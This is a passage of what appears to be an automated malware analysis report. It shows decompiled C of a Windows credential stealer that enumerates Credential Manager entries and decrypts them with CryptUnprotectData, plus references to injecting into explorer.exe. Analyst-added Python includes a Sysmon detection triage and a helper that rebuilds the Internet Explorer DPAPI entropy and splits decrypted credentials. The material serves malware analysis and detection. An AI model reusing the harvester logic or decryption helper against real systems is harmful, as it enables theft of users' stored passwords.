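    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}

# Rights a CreateRemoteThread-style injector needs on its target: allocate/protect
# memory, write the payload, start a thread on it.
INJECT_MASK = 0x0002 | 0x0008 | 0x0020

# Assumption: processes that legitimately open explorer.exe with these rights.
ACCESS_ALLOWLIST = {"csrss.exe", "lsass.exe", "svchost.exe", "msmpeng.exe"}
# Assumption: parents that normally start the shell (logon chain, shell restart).
PARENT_ALLOWLIST = {"userinit.exe", "winlogon.exe", "explorer.exe"}


def decode_access(mask: int) -> List[str]:
    """Expand a process access mask into the named rights it grants."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def can_inject(mask: int) -> bool:
    """True if the mask carries every right needed to write and run code in the target."""
    return mask & INJECT_MASK == INJECT_MASK


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, object]]) -> List[str]:
    """Flag the two observables E0040B7FC leaves: a write-capable handle to explorer.exe
    from an unexpected source, and explorer.exe spawned by an unexpected parent."""
    findings: List[str] = []
    for ev in events:
        if ev["EventID"] == 10 and _base(str(ev["TargetImage"])) == "explorer.exe":
            mask = int(str(ev["GrantedAccess"]), 16)
            if can_inject(mask) and _base(str(ev["SourceImage"])) not in ACCESS_ALLOWLIST:
                findings.append(
                    f"{ev['SourceImage']} opened explorer.exe with {ev['GrantedAccess']} "
                    f"({', '.join(decode_access(mask))})"
                )
        elif ev["EventID"] == 1 and _base(str(ev["Image"])) == "explorer.exe":
            if _base(str(ev["ParentImage"])) not in PARENT_ALLOWLIST:
                findings.append(f"explorer.exe started by unexpected parent {ev['ParentImage']}")
    return findings


# Constructed events; the dropper path is hypothetical.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # Normal: the logon chain starts the shell.
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe"},
    # Normal: read-only handle (QUERY_INFORMATION | VM_READ | QUERY_LIMITED_INFORMATION).
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1410"},
    # Suspicious: mirrors OpenProcess(0x1F0FFF, 0, pid) in E0040B7FC.
    {"EventID": 10, "SourceImage": r"C:\Windows\dropped.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF"},
    # Suspicious: mirrors the CreateProcessA("explorer.exe", CREATE_SUSPENDED) fallback.
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\dropped.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Two caveats when using this against real telemetry: Sysmon does not record the dwCreationFlags of CreateProcessA, so the CREATE_SUSPENDED detail in the fallback path is only visible in API-level tracing such as this sandbox run, and the mask check should stay on the three injection bits rather than on 0x1F0FFF literally, because a variant that requests only PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE would otherwise pass.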

                                    C-Code - Quality: 69%
                                    			E00408E58(char __eax, void* __ebx, void* __ecx, char* __edx, void* __edi, char* __esi, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				int _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				int _v32;
                                    				int _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char _v48;
                                    				intOrPtr _v52;
                                    				char _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				long _t168;
                                    				long _t238;
                                    				long _t251;
                                    				char* _t259;
                                    				signed int _t260;
                                    				intOrPtr _t262;
                                    				intOrPtr _t323;
                                    				intOrPtr _t326;
                                    				intOrPtr _t327;
                                    				long _t339;
                                    				long _t340;
                                    				intOrPtr _t343;
                                    				intOrPtr _t344;
                                    				void* _t350;
                                    
                                    				_t350 = __fp0;
                                    				_t341 = __esi;
                                    				_t343 = _t344;
                                    				_t262 = 0xd;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t262 = _t262 - 1;
                                    				} while (_t262 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t262;
                                    				_push(__esi);
                                    				_v12 =  *_t1;
                                    				_t259 = __edx;
                                    				_v8 = __eax;
                                    				E0040302C(_v8);
                                    				_push(_t343);
                                    				_push(0x4092a7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t344;
                                    				E00401AC0( &_v80);
                                    				_v16 = 0;
                                    				if(RegOpenKeyExA(0x80000001, _t259, 0, 1,  &_v24) == 0) {
                                    					_v28 = 0x400;
                                    					_t341 = E00401174(_v28);
                                    					while(RegEnumValueA(_v24, _v16, _t341,  &_v28, 0, 0, 0, 0) != 0x103) {
                                    						_v28 = 0x400;
                                    						_t339 = E00402E08();
                                    						__eflags = _t339;
                                    						if(_t339 >= 0) {
                                    							_t340 = _t339 + 1;
                                    							_t260 = 0;
                                    							__eflags = 0;
                                    							do {
                                    								E00408AF8( *((intOrPtr*)(_v8 + _t260 * 4)), _t260,  &_v20, _t340, _t341);
                                    								RegQueryValueExA(_v24, _t341, 0,  &_v32, 0,  &_v36);
                                    								_push(_v36);
                                    								E00402FBC();
                                    								_t344 = _t344 + 4;
                                    								_t238 = RegQueryValueExA(_v24, _t341, 0,  &_v32, _v40,  &_v36);
                                    								__eflags = _t238;
                                    								if(_t238 == 0) {
                                    									_v44 = _v40;
                                    									_v48 = _v36;
                                    									_v60 =  *((intOrPtr*)(_v8 + _t260 * 4));
                                    									E00402218( &_v84,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    									_v64 = E00402274(_v84) + 1 + E00402274(_v84) + 1;
                                    									_push( &_v56);
                                    									_push(1);
                                    									_push(0);
                                    									_push(0);
                                    									_push( &_v64);
                                    									_push(0);
                                    									_t251 =  &_v48;
                                    									_push(_t251);
                                    									L004086F0();
                                    									__eflags = _t251;
                                    									if(_t251 != 0) {
                                    										_push(_v80);
                                    										_push("Address: ");
                                    										E00401CDC( &_v88,  *((intOrPtr*)(_v8 + _t260 * 4)));
                                    										_push(_v88);
                                    										_push(0x4092d4);
                                    										E00401E10();
                                    										_push(_v80);
                                    										E00408CCC(_v52, _t260,  &_v92, _t340, _t341, _t350);
                                    										_push(_v92);
                                    										_push(0x4092e0);
                                    										E00401E10();
                                    									}
                                    								}
                                    								_t260 = _t260 + 1;
                                    								_t340 = _t340 - 1;
                                    								__eflags = _t340;
                                    							} while (_t340 != 0);
                                    						}
                                    						E00403738();
                                    						_t57 =  &_v16;
                                    						 *_t57 = _v16 + 1;
                                    						__eflags =  *_t57;
                                    					}
                                    				}
                                    				RegCloseKey(_v24);
                                    				L17:
                                    				while(E0040202C(0x4092e0, _v80) > 0) {
                                    					E00401FA4(_v80, E0040202C(0x4092e0, _v80) - 1, 1,  &_v72);
                                    					E00401FE4( &_v80, E0040202C(0x4092e0, _v80) + 1, 1);
                                    					E00401D9C( &_v100, 0x4092e0, _v72);
                                    					E0040592C(_v100, _t259, _v80, 0, _t341, __eflags,  &_v96);
                                    					E00401B58( &_v80, _v96);
                                    					__eflags = E0040202C(0x4092ec, _v72) - 1;
                                    					E00401FA4(_v72, E0040202C(0x4092ec, _v72) - 1, 1,  &_v104);
                                    					E00401E94(_v104, "Address");
                                    					if(__eflags == 0) {
                                    						E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    						E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v68);
                                    						E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    						while(1) {
                                    							_t168 = E0040202C(0x4092d4, _v72);
                                    							__eflags = _t168;
                                    							if(_t168 <= 0) {
                                    								goto L17;
                                    							}
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							_push(_v68);
                                    							_push(0x4092d4);
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v108);
                                    							_push(_v108);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401FE4( &_v72, E0040202C(0x409308, _v72), 1);
                                    							_push(_v76);
                                    							__eflags = E0040202C(0x4092d4, _v72) - 1;
                                    							E00401FA4(_v72, E0040202C(0x4092d4, _v72) - 1, 1,  &_v112);
                                    							_push(_v112);
                                    							_push(0x4092d4);
                                    							E00401E10();
                                    							E00401FE4( &_v72, E0040202C(0x4092d4, _v72), 1);
                                    							E00401D58( &_v76, 0x4092e0);
                                    						}
                                    					}
                                    				}
                                    				E00401B14(_v12, _v76);
                                    				_pop(_t323);
                                    				 *[fs:eax] = _t323;
                                    				_push(E004092AE);
                                    				E00401AE4( &_v112, 7);
                                    				E00402108( &_v84);
                                    				E00401AE4( &_v80, 4);
                                    				_t326 =  *0x408e34; // 0x408e38
                                    				E00402FC8( &_v40, _t326);
                                    				E00401AC0( &_v20);
                                    				_t327 =  *0x408730; // 0x408734
                                    				return E00402FC8( &_v8, _t327);
                                    			}
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00408EA7
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001), ref: 00408F05
                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,?,?,?), ref: 00408F37
                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 00408F89
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00000400,00000000,00000000,00000000,00000000,80000001,?,00000000,00000001,?,00000000,004092A7), ref: 0040900D
                                    • RegCloseKey.ADVAPI32(?,80000001,?,00000000,00000001,?,00000000,004092A7,?,?,?,?,00000000,00000000), ref: 00409021
                                      • Part of subcall function 00408AF8: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                      • Part of subcall function 00408AF8: CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                      • Part of subcall function 00408AF8: CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                      • Part of subcall function 00408AF8: CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                      • Part of subcall function 00408AF8: CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                      • Part of subcall function 00408AF8: CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Value$ContextDataQuery$AcquireCloseCreateDestroyEnumOpenParamReleaseUnprotect
                                    • String ID: Address$Address: $J
                                    • API String ID: 1010751750-89420950
                                    • Opcode ID: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction ID: a1307f370dcfab90242bbc2907a83997e987d907be1ae94acc32d6e323161374
                                    • Opcode Fuzzy Hash: 7efb64ff1d09feb6c5cb58f5f9c5601f3d714a3b7ee7f36232088a820c5129bc
                                    • Instruction Fuzzy Hash: CBC1D135A00109ABDB01EBD5C981ADEB7B9EF48304F20447BF500F73D6DA79AE468B59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930B(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				intOrPtr _v117;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t81;
                                    				void* _t86;
                                    				intOrPtr _t121;
                                    				void* _t160;
                                    				void* _t175;
                                    				void* _t187;
                                    				void* _t189;
                                    				short* _t191;
                                    				intOrPtr _t198;
                                    				intOrPtr _t203;
                                    				void* _t226;
                                    				void* _t233;
                                    				signed int _t234;
                                    				void* _t236;
                                    				intOrPtr* _t238;
                                    				intOrPtr _t240;
                                    				intOrPtr _t241;
                                    
                                    				_t174 = __ebx;
                                    				_v117 = _v117 + __edx;
                                    				_t240 = _t241;
                                    				_t175 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t175 = _t175 - 1;
                                    				} while (_t175 != 0);
                                    				_push(_t175);
                                    				_push(__ebx);
                                    				_t236 = __eax;
                                    				_push(_t240);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t241;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t238 = _t236;
                                    				_t233 = 0x25;
                                    				_t81 =  &_v151;
                                    				_t191 =  &_v114;
                                    				do {
                                    					 *_t191 = 0 << 2;
                                    					_t191 = _t191 + 2;
                                    					_t81 = _t81 + 1;
                                    					_t233 = _t233 - 1;
                                    				} while (_t233 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t86 = _v12 - 1;
                                    				if(_t86 >= 0) {
                                    					_v40 = _t86 + 1;
                                    					_t234 = 0;
                                    					do {
                                    						_t121 =  *((intOrPtr*)(_v8 + _t234 * 4));
                                    						_v16 =  *((intOrPtr*)(_t121 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t121 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t238);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t234 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t174 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t238);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t187);
                                    						E0040234C(_v180, _t187, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t238);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t160 = E00402274(_v204);
                                    						_push(_t160 - _t222);
                                    						E00402218( &_v208, _t174);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t174);
                                    						_pop(_t226);
                                    						_pop(_t189);
                                    						E0040234C(_v212, _t189, _t226, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t238, _v184);
                                    						_t234 = _t234 + 1;
                                    						_t60 =  &_v40;
                                    						 *_t60 = _v40 - 1;
                                    						_t249 =  *_t60;
                                    					} while ( *_t60 != 0);
                                    				}
                                    				E0040592C("Address: ", _t174,  *_t238, 0, _t238, _t249,  &_v216);
                                    				E00401B14(_t238, _v216);
                                    				E0040592C("User: ", _t174,  *_t238, 0, _t238, _t249,  &_v220);
                                    				E00401B14(_t238, _v220);
                                    				E0040592C("Password: ", _t174,  *_t238, 0, _t238, _t249,  &_v224);
                                    				E00401B14(_t238, _v224);
                                    				_pop(_t198);
                                    				 *[fs:eax] = _t198;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t203 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t203);
                                    			}
                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				char* _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v114;
                                    				void _v151;
                                    				char _v156;
                                    				intOrPtr _v160;
                                    				char _v164;
                                    				char _v168;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				intOrPtr _v184;
                                    				char _v188;
                                    				char _v192;
                                    				char _v196;
                                    				char _v200;
                                    				char _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				char _v220;
                                    				char _v224;
                                    				void* _t79;
                                    				void* _t84;
                                    				intOrPtr _t119;
                                    				void* _t158;
                                    				void* _t173;
                                    				void* _t185;
                                    				void* _t187;
                                    				short* _t188;
                                    				intOrPtr _t195;
                                    				intOrPtr _t200;
                                    				void* _t223;
                                    				void* _t230;
                                    				signed int _t231;
                                    				void* _t233;
                                    				intOrPtr* _t235;
                                    				intOrPtr _t237;
                                    				intOrPtr _t238;
                                    
                                    				_t172 = __ebx;
                                    				_t237 = _t238;
                                    				_t173 = 0x1b;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t173 = _t173 - 1;
                                    				} while (_t173 != 0);
                                    				_push(_t173);
                                    				_push(__ebx);
                                    				_t233 = __eax;
                                    				_push(_t237);
                                    				_push(0x409651);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t238;
                                    				E00401AC0(__eax);
                                    				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
                                    				asm("movsb");
                                    				_t235 = _t233;
                                    				_t230 = 0x25;
                                    				_t79 =  &_v151;
                                    				_t188 =  &_v114;
                                    				do {
                                    					 *_t188 = 0 << 2;
                                    					_t188 = _t188 + 2;
                                    					_t79 = _t79 + 1;
                                    					_t230 = _t230 - 1;
                                    				} while (_t230 != 0);
                                    				_v32 =  &_v114;
                                    				_v36 = 0x4a;
                                    				_push( &_v8);
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				L004086E8();
                                    				_t84 = _v12 - 1;
                                    				if(_t84 >= 0) {
                                    					_v40 = _t84 + 1;
                                    					_t231 = 0;
                                    					do {
                                    						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
                                    						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
                                    						_v20 =  *((intOrPtr*)(_t119 + 0x18));
                                    						_push( &_v28);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v36);
                                    						_push(0);
                                    						_push( &_v20);
                                    						L004086F0();
                                    						_push( *_t235);
                                    						_push("Address: ");
                                    						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
                                    						_push(_v156);
                                    						_push(0x4096a4);
                                    						E00401E10();
                                    						E00401174(_v28);
                                    						_t172 = _v24;
                                    						E00401D9C( &_v168, "User: ",  *_t235);
                                    						E00402254( &_v164, _v168);
                                    						_push(_v164);
                                    						_push( &_v172);
                                    						E00402218( &_v176, _v24);
                                    						_push(E00402398(0x4096bc, _v176) - 1);
                                    						E00402218( &_v180, _v24);
                                    						_pop(_t185);
                                    						E0040234C(_v180, _t185, 0, 0);
                                    						_push(_v172);
                                    						_push(0x4096c4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v160);
                                    						E00401D9C( &_v192, "Password: ",  *_t235);
                                    						E00402254( &_v188, _v192);
                                    						_push(_v188);
                                    						_push( &_v196);
                                    						E00402218( &_v200, _v24);
                                    						_push(E00402398(0x4096bc, _v200));
                                    						E00402218( &_v204, _v24);
                                    						_t158 = E00402274(_v204);
                                    						_push(_t158 - _t219);
                                    						E00402218( &_v208, _t172);
                                    						_push(E00402398(0x4096bc, _v208) + 1);
                                    						E00402218( &_v212, _t172);
                                    						_pop(_t223);
                                    						_pop(_t187);
                                    						E0040234C(_v212, _t187, _t223, 0);
                                    						_push(_v196);
                                    						_push(0x4096c4);
                                    						_push(0x4096e4);
                                    						E00402280();
                                    						E00401D3C(_t235, _v184);
                                    						_t231 = _t231 + 1;
                                    						_t58 =  &_v40;
                                    						 *_t58 = _v40 - 1;
                                    						_t245 =  *_t58;
                                    					} while ( *_t58 != 0);
                                    				}
                                    				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
                                    				E00401B14(_t235, _v216);
                                    				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
                                    				E00401B14(_t235, _v220);
                                    				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
                                    				E00401B14(_t235, _v224);
                                    				_pop(_t195);
                                    				 *[fs:eax] = _t195;
                                    				_push(E00409658);
                                    				E00401AE4( &_v224, 3);
                                    				E00402120( &_v212, 5);
                                    				E00401AC0( &_v192);
                                    				E00402120( &_v188, 5);
                                    				E00401AC0( &_v168);
                                    				E00402120( &_v164, 2);
                                    				E00401AC0( &_v156);
                                    				_t200 =  *0x4086bc; // 0x4086c0
                                    				return E00402FC8( &_v8, _t200);
                                    			}
                                    Instruction addresses for the listing above: 0x0040930c through 0x00409650 (the per-line address column of the decompiler view, separated from its source lines by extraction).

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%
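                                    The routine above is a stored-credential harvester. CredEnumerateA(NULL, 0, &count, &creds) lists every Credential Manager entry; for each one the code reads TargetName (offset +8 of a 32-bit CREDENTIALA, emitted after "Address: ") and CredentialBlobSize/CredentialBlob (+0x18/+0x1c), then calls CryptUnprotectData with a 0x4a-byte optional-entropy blob that the 0x25-iteration loop at the top builds from the GUID literal "abe2869f-9b47-4cd9-a358-c22904dba7f7" (the decompiler has lost the source operand of the shift and renders it as `0 << 2`). That GUID is the entropy wininet applies to HTTP-authentication credentials Internet Explorer saved to Credential Manager, so the harvester is aimed at those entries. The Python below is an added analyst aid, not code from the sample or from the report: it reconstructs the entropy blob so the two constants in the listing can be checked against it, and shows how the decrypted blob is split into the "User: " and "Password: " fields. The ':' separator is an assumption; the literal the listing searches for (at 0x4096bc) is not among the visible strings.

```python
"""Reconstruct the DPAPI optional entropy used by the credential harvester above.

Added example for analysts; not code from the sample or from the report.
Facts taken from the listing: the GUID literal, a 0x25-iteration loop writing one
16-bit value per character shifted left by two, and cbData = 0x4a for the blob
passed to CryptUnprotectData. Assumption: the separator inside the decrypted
CredentialBlob is ':' (the literal is not visible in the decompile).
"""
import struct

# GUID literal copied from the listing; wininet seeds the entropy for IE-saved
# HTTP credentials with it.
IE_ENTROPY_GUID = "abe2869f-9b47-4cd9-a358-c22904dba7f7"

# Constants visible at the CryptUnprotectData call site in the listing.
LOOP_COUNT = 0x25   # 37 iterations, one 16-bit unit each
CB_ENTROPY = 0x4A   # 74-byte DATA_BLOB handed in as pOptionalEntropy


def ie_credential_entropy(guid: str = IE_ENTROPY_GUID) -> bytes:
    """Every GUID character as a little-endian UTF-16 code unit shifted left by 2,
    followed by the (still zero) shifted terminator: 36 + 1 units = 74 bytes."""
    units = [ord(ch) << 2 for ch in guid] + [0]
    return struct.pack("<%dH" % len(units), *units)


def entropy_matches_listing(entropy: bytes) -> bool:
    """Cross-check the reconstruction against the loop count and cbData observed."""
    return len(entropy) == CB_ENTROPY and len(entropy) // 2 == LOOP_COUNT


def split_credential_blob(decrypted: bytes, separator: str = ":") -> tuple:
    """Split a decrypted CredentialBlob (UTF-16LE) into (user, password).

    The listing locates a separator in the plaintext and reports the text before
    it as "User: " and the text after it as "Password: ". ':' is an assumption.
    A blob without the separator is returned whole as the user field."""
    text = decrypted.decode("utf-16-le").rstrip("\x00")
    user, sep, password = text.partition(separator)
    return (user, password) if sep else (text, "")


if __name__ == "__main__":
    blob = ie_credential_entropy()
    print("entropy (%d bytes): %s" % (len(blob), blob.hex()))
    print("matches listing constants:", entropy_matches_listing(blob))
    # Constructed sample plaintext; no real credential material involved.
    sample = "alice:s3cret".encode("utf-16-le") + b"\x00\x00"
    user, password = split_credential_blob(sample)
    print("Address: https://intranet.example/  User: %s  Password: %s" % (user, password))
```

                                    The reconstruction is exactly what a detection rule can key on: a 74-byte entropy blob whose first code unit is 0x0184 ('a' << 2) next to a CredEnumerate/CryptUnprotectData pair is a far stronger indicator than the GUID string alone, which also appears in legitimate password-recovery tools.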

                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
                                    				long* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
